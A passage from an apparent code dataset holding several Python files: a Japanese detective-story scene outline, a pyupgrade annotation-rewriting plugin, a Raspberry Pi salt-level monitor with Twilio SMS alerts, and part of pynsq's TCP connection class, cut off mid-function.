w.plot_note(\"$sherlockは誰かが$jackを表舞台に引っ張り出したい、その罠だと考える\"),\n )\n\n\ndef jacks_letter(w: World):\n return w.scene(\"$jackからの手紙\",\n w.plot_note(\"と、差出人不明の手紙に$jackからのメッセージがあった\"),\n w.plot_note(\"助けてほしいと\"),\n )\n\n\ndef sherlocks_message_for_jack(w: World):\n return w.scene(\"$sherlockのメッセージ\",\n w.plot_note(\"そこに$sherlockからの伝言を$ignesが持ってくる\"),\n w.plot_note(\"数日留守にすることと、$jackに会いに行ってくると書かれていた\"),\n )\n\n\ndef mysterious_case(w :World):\n return w.scene(\"怪奇事件\",\n w.plot_note(\"$sherlockは怪奇事件の特集記事を読みながら「こんなものは実在しない」と言う\"),\n w.plot_note(\"そもそも奇妙な現象、霊的なもの、不思議なものは人間が理解することを放棄していると説明する\"),\n w.plot_note(\"小さい頃、学校内で七不思議というものがあったが、それを全て解明したらみんなから怒られたと\"),\n )\n\n\ndef legend_of_dark_dog(w: World):\n return w.scene(\"魔獣伝説\",\n w.plot_note(\"そこに$wilsonがこんな話がある、と、ある孤島に伝わる魔獣伝説を話した\"),\n w.plot_note(\"そこはこの三年の間に六名もの犠牲者が出ているという\"),\n w.plot_note(\"最初は飼い犬や家畜が殺されているだけだった\"),\n w.plot_note(\"しかし最初に人の犠牲者が出た\"),\n w.plot_note(\"それはどう見ても人の手によるものではなく、何か獣による被害だった\"),\n w.plot_note(\"最初の事件から次の事件まではかなり時間が開いたが、直近はこの三ヶ月の間に二件も殺人事件が起こっている\"),\n w.plot_note(\"$sherlockはそれだけ続くなら必ず人の手が関わっていると断言する\"),\n )\n\n\ndef invitation_from_dark_island(w: World):\n return w.scene(\"孤島からの招待状\",\n w.plot_note(\"そこに招待状が届く\"),\n w.plot_note(\"$wilsonはそれを開封し、噂をしていれば、とその伝説の孤島に暮らす城主からの招待状だと言った\"),\n )\n\n\ndef commision_of_murder_case(w: World):\n return w.scene(\"殺人事件の解決依頼\",\n w.plot_note(\"$sherlockは新聞を読んでいた\"),\n w.plot_note(\"そこに殺人事件の調査依頼が持ち込まれる\"),\n w.plot_note(\"最初は$maryも驚いていたが今では慣れたもので、依頼人を案内して、飲み物を出しながら依頼内容を話すよう促す\"),\n w.plot_note(\"$maryは秘書気取りだった\"),\n w.plot_note(\"だが$sherlockは依頼人が出した名前に驚く\"),\n w.plot_note(\"それは$morianoの大学の後輩だったからだ\"),\n w.plot_note(\"犯罪学の研究をしている人間が殺された\"),\n w.plot_note(\"大学の研究室内での密室殺人。その手口が全く不明だが自殺ではないと警察は断定しているという\"),\n w.plot_note(\"さっそくその調査に向かう$sherlock\"),\n )\n\n\ndef moriano_is_here(w: World):\n return w.scene(\"$moriano見参\",\n w.plot_note(\"$sherlockが家に戻ってくるとそこには老人の姿があった\", \"$morianoだ\"),\n w.plot_note(\"$morianoは「はじめまして」と挨拶をし、それから今$sherlockたちがどういう経路で戻ってきたかを言い当てる\"),\n w.plot_note(\"$morianoは$sherlockに自分に関するすべてのことから手を引くようにと警告する\"),\n w.plot_note(\"$sherlockは$morianoがここに来ることも推測して既に逮捕する準備を整えているとブラフを張るが、彼には通用しなかった\"),\n w.plot_note(\"警察は別のところで起こった事件に駆けつけている\"),\n w.plot_note(\"$morianoは言う。すべての人間は自分の意志ではなく、環境要因によって動かされると。つまり誰でもが犯罪者になりうると\"),\n w.plot_note(\"$morianoは$maryに問いかける。彼女は$sherlockを好きだろうと\"),\n w.plot_note(\"$morianoは$limeに本心では王室に帰りたいだろうと\"),\n w.plot_note(\"$wilsonについての言及はとくないが、ここの人間には言えない本音を隠しているだろうと\"),\n w.plot_note(\"$morianoは逃げないからいつでも自分の屋敷に来るがいいと言い残して、去っていく\"),\n )\n\n\ndef marys_strange(w: World):\n return w.scene(\"奇妙な$mary\",\n w.plot_note(\"$morianoがきてから$maryの様子がおかしい\"),\n w.plot_note(\"$sherlockは$morianoを何とか見つけ出そうと躍起になっている\"),\n w.plot_note(\"$maryは$limeに相談することもできず、市場の$nowlisに愚痴る。自分だけが違う気がすると\"),\n )\n\n\ndef where_is_mary(w: World):\n return w.scene(\"$maryはどこへ?\",\n w.plot_note(\"すぐに$sherlockたちは$morianoの邸宅に向かう\"),\n )\n\n\ndef alive_moriano(w: World):\n return w.scene(\"$morianoは生きている\",\n w.plot_note(\"しかし後日、$morianoのメッセージが新聞に掲載される\"),\n w.plot_note(\"$maryは無事で丁重に監禁していると。場所は$sherlockなら推理できると書かれて、ヒントが残されていた\"),\n )\n\n\ndef morianos_whereabouts(w: World):\n return w.scene(\"$morianoの居場所\",\n w.plot_note(\"$sherlockはヒントから$maryの居場所は$morianoと関係ない場所にいると推測する\"),\n w.plot_note(\"$mary救出隊として少年探偵団の協力を仰ぐ\"),\n w.plot_note(\"その間に$sherlockはその新聞記事からたどり、$morianoがどこからメッセージを出しているのかを調べる\"),\n )\n\n\ndef vanished_sherlock(w: World):\n return w.scene(\"消えた$sherlock\",\n w.plot_note(\"$maryたちが戻ると、そこには$sherlockの姿がなかった\"),\n )\n\n\ndef sherlocks_information(w: World):\n return w.scene(\"$sherlockに関する情報\",\n w.plot_note(\"$maryが目覚めるとそこに$sherlockの姿がいなかった\"),\n w.plot_note(\"戻ってきた$wilsonは$sherlockの手がかりを追ったが見失ったと言う\"),\n w.plot_note(\"$maryは$sherlockが戻ってくると信じて待っていたが、連絡も戻ってくることもなかった\"),\n )\n\n\ndef no_sherlock_life(w: World):\n return w.scene(\"$sherlock不在の生活\",\n \"同・寝室\",\n w.plot_note(\"一月が経ち、$maryたちは$sherlockのいない生活に馴染み始めていた\"),\n )\n\n\ndef serching_sherlock(w: World):\n return w.scene(\"$sherlockの捜索隊\",\n w.plot_note(\"町では$morianoも$sherlockも消えたというのに犯罪は起こっていた\"),\n w.plot_note(\"$wilsonは手を尽くして$sherlockを探す\"),\n w.plot_note(\"$limeが王室のツテを使い、何とか情報を集めると言い出す\"),\n w.plot_note(\"少年探偵団も手を尽くした\"),\n w.plot_note(\"今まで世話になった人たちも$sherlockのことを探してくれた\"),\n w.plot_note(\"それでも情報すら見つからない\"),\n )\n\n\ndef arrived_his_message(w: World):\n return w.scene(\"$sherlockからのメッセージ\",\n w.plot_note(\"雨の酷いある日、一通の郵便が届く\"),\n w.plot_note(\"届いた手紙には宛名がなかったが$sherlock特有の署名が入っていた\"),\n )\n\n\ndef sadness_report(w: World):\n return w.scene(\"悲しいお知らせ\",\n w.plot_note(\"手紙の冒頭にはこう書かれていた\"),\n w.plot_note(\"この手紙が届いたならば自分はすでにこの世界にいないだろうと$sherlockは書いていた\"),\n w.plot_note(\"手紙は$morianoの隠れ家に向かう直前に書いて出したと書かれている\"),\n w.plot_note(\"$morianoは用意周到で、約束通り一人で待っていたりはしない\"),\n w.plot_note(\"$sherlockは陽動をして、手下たちを遠ざけて、可能ならば$morianoをおびき出す\"),\n w.plot_note(\"どうにか一対一で話せる場所を作る、と書いてある\"),\n w.plot_note(\"$morianoがどこまで語るか、告白するかわからないが、彼がやってきた悪事について書き残しておく\"),\n w.plot_note(\"$morianoのことは以前教えたが、大学を出たあとの彼については今回独自調査を行うまで不明な部分が多かった\"),\n w.plot_note(\"$morianoは$cultXと呼ばれる宗教団体との接触から犯罪者人生が始まる\"),\n w.plot_note(\"彼はその教義である人間の本性である「悪」を反映させようとしていた\"),\n w.plot_note(\"今までに解決した事件の裏側にはこの教団か、その教団の人間、関係者が細い糸で繋がっていた\"),\n w.plot_note(\"その大本である$morianoを何としても打ち取ると宣言されていた\"),\n w.plot_note(\"$maryたちは$sherlockがどうなったのか気になり、手紙を出した場所に向かおうとする\"),\n w.plot_note(\"だが$wilsonによりそれは止められる\"),\n w.plot_note(\"兄の$mikelがやってきて「$sherlockがなくなった」と告げた\"),\n )\n\n\n## in Empty House\ndef believed_his_alive(w: World):\n mary, lime, wil = w.get(\"mary\"), w.get(\"lime\"), w.get(\"wilson\")\n return w.scene(\"$sherlockの生存を信じて\",\n w.change_camera(\"mary\"),\n w.change_stage(KITCHEN),\n w.change_time(\"morning\"),\n w.plot_note(\"$maryたちは$sherlockが生きていると思って捜索を続けていた\"),\n w.plot_note(\"しかし何の情報もなく、ただ時間だけが過ぎていく\"),\n w.plot_note(\"家を失い、$wilsonの住まいに居候していた$maryたち\"),\n w.plot_note(\"$wilsonは忙しそうに外に出ていることが増えた\"),\n w.plot_note(\"$maryは$sherlockの手紙にヒントはないかと考えるが、何も見つからない\"),\n mary.be(\"皿洗いをしている$S\"),\n mary.think(\"もう一月も$sherlockは失踪を続けている\"),\n mary.think(\"完全に死んだものと思われていたが、$Sたちは捜索を続けていた\"),\n mary.do(\"棚には$sherlockのコップが残っている\"),\n mary.think(\"それを目にして涙が滲む\"),\n mary.think(\"でも$sherlockが送ってきたメッセージにはわざわざ自分が死んだと思ってくれと書かれていた\"),\n mary.think(\"何故そんなことを書いたのか、$Sは気になっていた\"),\n mary.talk(\"あっ\"),\n mary.do(\"$wilsonの湯呑が割れてしまう\"),\n mary.talk(\"$wilsonのだし、いいか\"),\n )\n\n\ndef news_of_sherlock_alive(w: World):\n mary, lime, wil = w.get(\"mary\"), w.get(\"lime\"), w.get(\"wilson\")\n return w.scene(\"$sherlock生存情報\",\n w.change_camera(\"mary\"),\n w.change_stage(LIVING),\n w.change_time(\"noon\"),\n w.plot_note(\"だが$limeはそこに$sherlockが生きているという証拠を見つけた\"),\n w.plot_note(\"そこに$wilsonが戻ってくる\"),\n w.plot_note(\"$wilsonは「$sherlockに似た人間を見かけた」という情報を聞いたと話した\"),\n mary.come(\"買い物を終えて帰ってきた$S\"),\n lime.be(\"$Sは家の片付けをしていた\"),\n wil.come(\"そこに$Sが興奮した様子で戻ってくる\"),\n mary.talk(\"何かあったん?\"),\n wil.talk(\"聞いてくれ\", \"いた\", \"$sherlockが、いたんだ\"),\n mary.do(\"驚きで声が出ない$S\"),\n lime.do(\"掃除の手が止まる$S\"),\n wil.talk(\"$meもまだ聞いたばかりの話で、本当かどうかの確認すらできていないんだが、それでもこれまで何の情報もなかったところにこれは大きいよ\"),\n wil.talk(\"$EastEndの空き家に夜な夜な明かりが灯る家があるそうなんだ\",\n \"どうやらそこに$sherlockによく似た人間が入っていくのを見たって、ホームレスの目撃情報があった\"),\n mary.talk(\"でもどうしてそれが$sherlockなん? 別人の可能性はないん?\"),\n wil.talk(\"それが以前$sherlockが世話をしたホームレスで、彼のことをよく覚えていたんだよ\",\n \"遠目にもあの特徴的な寝癖頭とそこに被ったハンチング、チェック柄のコートは$sherlockに間違いないって\"),\n mary.think(\"その話に興奮する$S\"),\n mary.talk(\"場所は?\"),\n mary.do(\"荷物を置くと、$wilsonに詰め寄った\"),\n )\n\n\ndef consideration_of_sherlock(w: World):\n return w.scene(\"容疑者$sherlockについての考察\",\n # NOTE: omit?\n w.plot_note(\"一旦家に戻り、犯人にされてしまった$sherlockについて考える\"),\n w.plot_note(\"$wilsonは$sherlockが$moriano一味に騙されたというのだが\"),\n w.plot_note(\"もう一度あの空き家を訪れる\"),\n )\n\n\ndef help_from_sherlock(w: World):\n lime = w.get(\"lime\")\n wil = w.get(\"wilson\")\n ignes = w.get(\"ignes\")\n return w.scene(\"$sherlockからの救援情報\",\n w.change_camera(\"lime\"),\n w.change_stage(LIVING),\n lime.be(\"一人で$sherlockの家に戻っている$S\"),\n lime.do(\"消えた$maryを探してくるとでかけた$wilson\"),\n lime.do(\"$Sはポストに入っていた宛名のない封書を見つける\"),\n lime.do(\"そこには$maryが$morianoの手の者に捕まり、監禁されていると書かれていた\"),\n ignes.come(\"$Sがやってきて\"),\n ignes.talk(\"$mary嬢ちゃんは?\"),\n ignes.do(\"事情を聞く$S\"),\n ignes.talk(\"すぐ手配して、場所を突き止める\", \"$limeさんは警察に行って事情を説明してきて\"),\n )\n\n\ndef injured_wilson(w: World):\n return w.scene(\"負傷した$wilson\",\n # NOTE: omit/方針変更\n w.plot_note(\"家に戻ると$wilsonがいて、ひどい怪我を負っていたが、無事に逃げ出したと言う\"),\n w.plot_note(\"$maryは自分たちを助けた男が$sherlockの生存を言っていたと伝える\"),\n w.plot_note(\"$wilsonはそのホームレスのことを教えてくれと頼む\"),\n w.plot_note(\"$maryたちにここで休むようにいい、$wilsonは$sherlockを探しに出ていった\"),\n w.plot_note(\"そこに$wilsonが指名手配されたと$restradeがやってくる\"),\n )\n\n\ndef burned_shal_home(w: World):\n shal = w.get(\"sherlock\")\n wil, lime = w.get(\"wilson\"), w.get(\"lime\")\n ignes, pat = w.get(\"ignes\"), w.get(\"patson\")\n lisa = w.get(\"lisa\")\n return w.scene(\"家が燃えて\",\n w.change_camera(\"sherlock\"),\n w.change_stage(HOME),\n shal.come(\"$Sたちは$wilsonの車で火事で全焼してしまった住居前にやってくる\"),\n wil.come(),\n lime.come(),\n shal.do(\"みんな呆然としてその光景を見ている\"),\n shal.do(\"消防士たちが$magicポンプで水をかけている。少しずつ火勢は衰え、もう消火が近い\"),\n shal.do(\"近所の人も出て、野次馬が集まっている\"),\n lisa.come(\"大家の$Sがやってきて、びっくりして呆然\"),\n lisa.talk(\"な、何なんですか、これは!\"),\n shal.talk(\"ああ、$ln_lisaさん、どうもご無沙汰しています\"),\n lisa.talk(\"ねえ$sherlockさん、これは一体どういうことなのかしら\"),\n shal.talk(\"火事みたいですね。おそらく放火でしょう。迷惑なことです\"),\n lisa.talk(\"燃えたのは誰の家なの?\"),\n shal.talk(\"$meが借りていたあなたの家です\"),\n lisa.talk(\"ええ、そうよね。そうだと思ったわ\"),\n lisa.do(\"見る間に表情が変わっていく夫人\"),\n lisa.talk(\"この弁償、誰が支払ってくれるのかしら\"),\n shal.talk(\"契約上は$meに過失があった場合は$meですが、放火の責任を取れと言われても困りますから、おそらくオーナー夫人の方になるかと\"),\n lisa.talk(\"何ですって!\"),\n shal.talk(\"用事があったのを思い出したので失礼\"),\n shal.do(\"$wilsonの車に乗り込む$S\"),\n wil.do(\"仕方ない、といった感じで車に乗り込む$S\"),\n )\n\n"} {"ext": "py", "sha": "1a2ec33fff551516eb2ab280bb118cd7e8efbed2", "content": "from .bedloader import ROI\n"} {"ext": "py", "sha": "1a2ec3e6f6d257f7ceaa7fb9461283f2be172d25", "content": "from __future__ import annotations\n\nimport ast\nimport functools\nimport sys\nfrom typing import Iterable\n\nfrom tokenize_rt import NON_CODING_TOKENS\nfrom tokenize_rt import Offset\nfrom tokenize_rt import Token\n\nfrom pyupgrade._ast_helpers import ast_to_offset\nfrom pyupgrade._ast_helpers import is_name_attr\nfrom pyupgrade._data import register\nfrom pyupgrade._data import State\nfrom pyupgrade._data import TokenFunc\nfrom pyupgrade._token_helpers import CLOSING\nfrom pyupgrade._token_helpers import find_closing_bracket\nfrom pyupgrade._token_helpers import find_token\nfrom pyupgrade._token_helpers import OPENING\n\n\ndef _fix_optional(i: int, tokens: list[Token]) -> None:\n j = find_token(tokens, i, '[')\n k = find_closing_bracket(tokens, j)\n if tokens[j].line == tokens[k].line:\n tokens[k] = Token('CODE', ' | None')\n del tokens[i:j + 1]\n else:\n tokens[j] = tokens[j]._replace(src='(')\n tokens[k] = tokens[k]._replace(src=')')\n tokens[i:j] = [Token('CODE', 'None | ')]\n\n\ndef _fix_union(\n i: int,\n tokens: list[Token],\n *,\n arg_count: int,\n) -> None:\n depth = 1\n parens_done = []\n open_parens = []\n commas = []\n coding_depth = None\n\n j = find_token(tokens, i, '[')\n k = j + 1\n while depth:\n # it's possible our first coding token is a close paren\n # so make sure this is separate from the if chain below\n if (\n tokens[k].name not in NON_CODING_TOKENS and\n tokens[k].src != '(' and\n coding_depth is None\n ):\n if tokens[k].src == ')': # the coding token was an empty tuple\n coding_depth = depth - 1\n else:\n coding_depth = depth\n\n if tokens[k].src in OPENING:\n if tokens[k].src == '(':\n open_parens.append((depth, k))\n\n depth += 1\n elif tokens[k].src in CLOSING:\n if tokens[k].src == ')':\n paren_depth, open_paren = open_parens.pop()\n parens_done.append((paren_depth, (open_paren, k)))\n\n depth -= 1\n elif tokens[k].src == ',':\n commas.append((depth, k))\n\n k += 1\n k -= 1\n\n assert coding_depth is not None\n assert not open_parens, open_parens\n comma_depth = min((depth for depth, _ in commas), default=sys.maxsize)\n min_depth = min(comma_depth, coding_depth)\n\n to_delete = [\n paren\n for depth, positions in parens_done\n if depth < min_depth\n for paren in positions\n ]\n\n if comma_depth <= coding_depth:\n comma_positions = [k for depth, k in commas if depth == comma_depth]\n if len(comma_positions) == arg_count:\n to_delete.append(comma_positions.pop())\n else:\n comma_positions = []\n\n to_delete.sort()\n\n if tokens[j].line == tokens[k].line:\n del tokens[k]\n for comma in comma_positions:\n tokens[comma] = Token('CODE', ' |')\n for paren in reversed(to_delete):\n del tokens[paren]\n del tokens[i:j + 1]\n else:\n tokens[j] = tokens[j]._replace(src='(')\n tokens[k] = tokens[k]._replace(src=')')\n\n for comma in comma_positions:\n tokens[comma] = Token('CODE', ' |')\n for paren in reversed(to_delete):\n del tokens[paren]\n del tokens[i:j]\n\n\ndef _supported_version(state: State) -> bool:\n return (\n state.in_annotation and (\n state.settings.min_version >= (3, 10) or (\n not state.settings.keep_runtime_typing and\n 'annotations' in state.from_imports['__future__']\n )\n )\n )\n\n\ndef _any_arg_is_str(node_slice: ast.expr) -> bool:\n return (\n isinstance(node_slice, ast.Str) or (\n isinstance(node_slice, ast.Tuple) and\n any(isinstance(elt, ast.Str) for elt in node_slice.elts)\n )\n )\n\n\n@register(ast.Subscript)\ndef visit_Subscript(\n state: State,\n node: ast.Subscript,\n parent: ast.AST,\n) -> Iterable[tuple[Offset, TokenFunc]]:\n if not _supported_version(state):\n return\n\n # prevent rewriting forward annotations\n if (\n (sys.version_info >= (3, 9) and _any_arg_is_str(node.slice)) or\n (\n sys.version_info < (3, 9) and\n isinstance(node.slice, ast.Index) and\n _any_arg_is_str(node.slice.value)\n )\n ):\n return\n\n if is_name_attr(\n node.value,\n state.from_imports,\n ('typing',),\n ('Optional',),\n ):\n yield ast_to_offset(node), _fix_optional\n elif is_name_attr(node.value, state.from_imports, ('typing',), ('Union',)):\n if sys.version_info >= (3, 9): # pragma: >=3.9 cover\n node_slice = node.slice\n elif isinstance(node.slice, ast.Index): # pragma: <3.9 cover\n node_slice: ast.AST = node.slice.value\n else: # pragma: <3.9 cover\n node_slice = node.slice # unexpected slice type\n\n if isinstance(node_slice, ast.Slice): # not a valid annotation\n return\n\n if isinstance(node_slice, ast.Tuple):\n if node_slice.elts:\n arg_count = len(node_slice.elts)\n else:\n return # empty Union\n else:\n arg_count = 1\n\n func = functools.partial(_fix_union, arg_count=arg_count)\n yield ast_to_offset(node), func\n"} {"ext": "py", "sha": "1a2ec412040c3a5ef81d550375c59efa89b2e989", "content": "import argparse\nimport logging\nimport time\n\nimport sys\nfrom twilio.rest import Client\n\nimport settings\nimport RPi.GPIO as GPIO\n\ntwilio = Client(settings.TWILIO_PUBLIC_KEY, settings.TWILIO_SECRET_KEY)\nlog = logging.getLogger(__name__)\n\n\nclass SaltLevelMonitor(object):\n def __init__(self, force_report=False, unit=settings.METRIC, threshold=0,\n tank_depth=settings.DEFAULT_TANK_DEPTH):\n self.force_report = force_report\n self.unit = unit if unit in settings.VALID_UNITS else settings.METRIC\n self.notation = 'inches' if unit == settings.IMPERIAL else 'centimeters'\n self.threshold = float(threshold)\n self.tank_depth = float(tank_depth)\n self.distance = None\n self.remaining_salt = None\n\n def check_salt_level(self):\n self.distance = self.get_average_distance()\n self._convert_units()\n self.remaining_salt = self.tank_depth - self.distance\n message = self._get_report_message()\n log.info('Salt level is: {0:.2f} {1}'.format(self.remaining_salt, self.notation))\n if self.remaining_salt < self.threshold or self.force_report:\n log.info(message['body'])\n self.report_salt_level(message)\n\n def get_average_distance(self):\n \"\"\" used to get an average read since the sensor isn't 100% accurate \"\"\"\n reads = [self.get_distance() for _ in range(settings.READS_PER_CHECK)]\n return sum(reads) / settings.READS_PER_CHECK\n\n @staticmethod\n def get_distance():\n \"\"\" returns distance in centimeters \"\"\"\n # set Trigger to HIGH\n GPIO.output(settings.GPIO_TRIGGER, True)\n\n # set Trigger after 0.01ms to LOW\n time.sleep(0.00001)\n GPIO.output(settings.GPIO_TRIGGER, False)\n\n start_time = time.time()\n stop_time = time.time()\n\n # save StartTime\n while GPIO.input(settings.GPIO_ECHO) == 0:\n start_time = time.time()\n\n # save time of arrival\n while GPIO.input(settings.GPIO_ECHO) == 1:\n stop_time = time.time()\n\n # time difference between start and arrival\n time_elapsed = stop_time - start_time\n return (time_elapsed * settings.SPEED_OF_SOUND) / 2\n\n def _convert_units(self):\n \"\"\"\n convert distance to inches if IMPERIAL or convert tank_depth and threshold to centimeters\n \"\"\"\n if self.unit == settings.IMPERIAL:\n self.distance = self.distance / settings.CM_TO_INCHES\n else:\n self.tank_depth = self.tank_depth * settings.CM_TO_INCHES\n self.threshold = self.threshold * settings.CM_TO_INCHES\n\n def _get_report_message(self):\n message = settings.MESSAGE_TEMPLATE.copy()\n message['body'] = settings.SALT_LEVEL_ALERT_MESSAGE.format(\n self.remaining_salt, self.notation)\n if self.force_report:\n message['body'] = '{} (forced report)'.format(message['body'])\n return message\n\n @staticmethod\n def report_salt_level(message):\n twilio.messages.create(**message)\n\n def __enter__(self):\n GPIO.setmode(GPIO.BCM)\n\n # set GPIO direction (IN / OUT)\n GPIO.setup(settings.GPIO_TRIGGER, GPIO.OUT)\n GPIO.setup(settings.GPIO_ECHO, GPIO.IN)\n return self\n\n def __exit__(self, *args):\n GPIO.cleanup()\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Salty Dog')\n parser.add_argument('-u',\n '--unit',\n action='store',\n dest='unit',\n default='metric',\n help='Unit of measure used in reporting')\n parser.add_argument('-t',\n '--threshold',\n action='store',\n dest='threshold',\n help='Threshold for reporting in inches or cm (must match --unit)')\n parser.add_argument('-d',\n '--tank-depth',\n action='store',\n dest='tank_depth',\n help='Total depth of your salt tank in inches or cm (must match --unit)')\n parser.add_argument('-f',\n '--force-report',\n action='store_true',\n dest='force_report',\n default=False,\n help='Force Salty Dog to send SMS regardless of salt level measured')\n args = parser.parse_args(sys.argv[1:])\n parsed_kwargs = {\n 'force_report': args.force_report,\n 'unit': args.unit,\n 'threshold': args.threshold,\n 'tank_depth': args.tank_depth,\n }\n with SaltLevelMonitor(**parsed_kwargs) as monitor:\n monitor.check_salt_level()\n"} {"ext": "py", "sha": "1a2ec4fda02beef4f3b97ff5f4100c3805bf6108", "content": "from __future__ import absolute_import\nfrom __future__ import unicode_literals\n\nimport time\nimport socket\nimport logging\n\nfrom ._compat import bytes_types, string_types\nfrom ._compat import struct_l\nfrom .version import __version__\n\ntry:\n import ssl\nexcept ImportError:\n ssl = None # pyflakes.ignore\n\ntry:\n from .snappy_socket import SnappySocket\nexcept ImportError:\n SnappySocket = None # pyflakes.ignore\n\ntry:\n import simplejson as json\nexcept ImportError:\n import json # pyflakes.ignore\n\nimport tornado.iostream\nimport tornado.ioloop\n\ntry:\n from tornado.simple_httpclient import _default_ca_certs as default_ca_certs\nexcept ImportError:\n # Tornado < 4\n from tornado.simple_httpclient import _DEFAULT_CA_CERTS\n\n def default_ca_certs():\n return _DEFAULT_CA_CERTS\n\nfrom nsq import event, protocol\nfrom .deflate_socket import DeflateSocket\n\nlogger = logging.getLogger(__name__)\n\n\n# states\nINIT = 'INIT'\nDISCONNECTED = 'DISCONNECTED'\nCONNECTING = 'CONNECTING'\nCONNECTED = 'CONNECTED'\n\n\nDEFAULT_USER_AGENT = 'pynsq/%s' % __version__\n\n\nclass AsyncConn(event.EventedMixin):\n \"\"\"\n Low level object representing a TCP connection to nsqd.\n\n When a message on this connection is requeued and the requeue delay\n has not been specified, it calculates the delay automatically by an\n increasing multiple of ``requeue_delay``.\n\n Generates the following events that can be listened to with\n :meth:`nsq.AsyncConn.on`:\n\n * ``connect``\n * ``close``\n * ``error``\n * ``identify``\n * ``identify_response``\n * ``auth``\n * ``auth_response``\n * ``heartbeat``\n * ``ready``\n * ``message``\n * ``response``\n * ``backoff``\n * ``resume``\n\n :param host: the host to connect to\n\n :param port: the post to connect to\n\n :param timeout: the timeout for read/write operations (in seconds)\n\n :param heartbeat_interval: the amount of time (in seconds) to negotiate\n with the connected producers to send heartbeats (requires nsqd 0.2.19+)\n\n :param requeue_delay: the base multiple used when calculating requeue delay\n (multiplied by # of attempts)\n\n :param tls_v1: enable TLS v1 encryption (requires nsqd 0.2.22+)\n\n :param tls_options: dictionary of options to pass to `ssl.wrap_socket()\n `_ as\n ``**kwargs``\n\n :param snappy: enable Snappy stream compression (requires nsqd 0.2.23+)\n\n :param deflate: enable deflate stream compression (requires nsqd 0.2.23+)\n\n :param deflate_level: configure the deflate compression level for this\n connection (requires nsqd 0.2.23+)\n\n :param output_buffer_size: size of the buffer (in bytes) used by nsqd\n for buffering writes to this connection\n\n :param output_buffer_timeout: timeout (in ms) used by nsqd before\n flushing buffered writes (set to 0 to disable). **Warning**:\n configuring clients with an extremely low (``< 25ms``)\n ``output_buffer_timeout`` has a significant effect on ``nsqd``\n CPU usage (particularly with ``> 50`` clients connected).\n\n :param sample_rate: take only a sample of the messages being sent\n to the client. Not setting this or setting it to 0 will ensure\n you get all the messages destined for the client.\n Sample rate can be greater than 0 or less than 100 and the client\n will receive that percentage of the message traffic.\n (requires nsqd 0.2.25+)\n\n :param user_agent: a string identifying the agent for this client\n in the spirit of HTTP (default: ``/``)\n (requires nsqd 0.2.25+)\n\n :param auth_secret: a byte string passed when using nsq auth\n (requires nsqd 1.0+)\n\n :param msg_timeout: the amount of time (in seconds) that nsqd will wait\n before considering messages that have been delivered to this\n consumer timed out (requires nsqd 0.2.28+)\n\n :param hostname: a string identifying the host where this client runs\n (default: ````)\n \"\"\"\n def __init__(\n self,\n host,\n port,\n timeout=1.0,\n heartbeat_interval=30,\n requeue_delay=90,\n tls_v1=False,\n tls_options=None,\n snappy=False,\n deflate=False,\n deflate_level=6,\n user_agent=DEFAULT_USER_AGENT,\n output_buffer_size=16 * 1024,\n output_buffer_timeout=250,\n sample_rate=0,\n io_loop=None,\n auth_secret=None,\n msg_timeout=None,\n hostname=None):\n assert isinstance(host, string_types)\n assert isinstance(port, int)\n assert isinstance(timeout, float)\n assert isinstance(tls_options, (dict, None.__class__))\n assert isinstance(deflate_level, int)\n assert isinstance(heartbeat_interval, int) and heartbeat_interval >= 1\n assert isinstance(requeue_delay, int) and requeue_delay >= 0\n assert isinstance(output_buffer_size, int) and output_buffer_size >= 0\n assert isinstance(output_buffer_timeout, int) and output_buffer_timeout >= 0\n assert isinstance(sample_rate, int) and sample_rate >= 0 and sample_rate < 100\n assert isinstance(auth_secret, bytes_types + (None.__class__,))\n assert tls_v1 and ssl or not tls_v1, \\\n 'tls_v1 requires Python 2.6+ or Python 2.5 w/ pip install ssl'\n assert msg_timeout is None or (isinstance(msg_timeout, (float, int)) and msg_timeout > 0)\n\n self.state = INIT\n self.host = host\n self.port = port\n self.timeout = timeout\n self.last_recv_timestamp = time.time()\n self.last_msg_timestamp = time.time()\n self.in_flight = 0\n self.rdy = 0\n self.rdy_timeout = None\n # for backwards compatibility when interacting with older nsqd\n # (pre 0.2.20), default this to their hard-coded max\n self.max_rdy_count = 2500\n self.tls_v1 = tls_v1\n self.tls_options = tls_options\n self.snappy = snappy\n self.deflate = deflate\n self.deflate_level = deflate_level\n self.hostname = hostname\n if self.hostname is None:\n self.hostname = socket.gethostname()\n self.short_hostname = self.hostname.split('.')[0]\n self.heartbeat_interval = heartbeat_interval * 1000\n self.msg_timeout = int(msg_timeout * 1000) if msg_timeout else None\n self.requeue_delay = requeue_delay\n self.io_loop = io_loop\n if not self.io_loop:\n self.io_loop = tornado.ioloop.IOLoop.instance()\n\n self.output_buffer_size = output_buffer_size\n self.output_buffer_timeout = output_buffer_timeout\n self.sample_rate = sample_rate\n self.user_agent = user_agent\n\n self._authentication_required = False # tracking server auth state\n self.auth_secret = auth_secret\n\n self.socket = None\n self.stream = None\n self._features_to_enable = []\n\n self.last_rdy = 0\n self.rdy = 0\n\n self.callback_queue = []\n\n super(AsyncConn, self).__init__()\n\n @property\n def id(self):\n return str(self)\n\n def __str__(self):\n return self.host + ':' + str(self.port)\n\n def connected(self):\n return self.state == CONNECTED\n\n def connecting(self):\n return self.state == CONNECTING\n\n def closed(self):\n return self.state in (INIT, DISCONNECTED)\n\n def connect(self):\n if not self.closed():\n return\n\n self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.socket.settimeout(self.timeout)\n self.socket.setblocking(0)\n\n self.stream = tornado.iostream.IOStream(self.socket, io_loop=self.io_loop)\n self.stream.set_close_callback(self._socket_close)\n self.stream.set_nodelay(True)\n\n self.state = CONNECTING\n self.on(event.CONNECT, self._on_connect)\n self.on(event.DATA, self._on_data)\n\n self.stream.connect((self.host, self.port), self._connect_callback)\n\n def _connect_callback(self):\n self.state = CONNECTED\n self.stream.write(protocol.MAGIC_V2)\n self._start_read()\n self.trigger(event.CONNECT, conn=self)\n\n def _read_bytes(self, size, callback):\n try:\n self.stream.read_bytes(size, callback)\n except IOError:\n self.close()\n self.trigger(\n event.ERROR,\n conn=self,\n error=protocol.ConnectionClosedError('Stream is closed'),\n )\n\n def _start_read(self):\n self._read_bytes(4, self._read_size)\n\n def _socket_close(self):\n self.state = DISCONNECTED\n self.trigger(event.CLOSE, conn=self)\n\n def close(self):\n self.stream.close()\n\n def _read_size(self, data):\n try:\n size = struct_l.unpack(data)[0]\n except Exception:\n self.close()\n self.trigger(\n event.ERROR,\n conn=self,\n error=protocol.IntegrityError('failed to unpack size'),\n )\n return\n self._read_bytes(size, self._read_body)\n\n def _read_body(self, data):\n try:\n 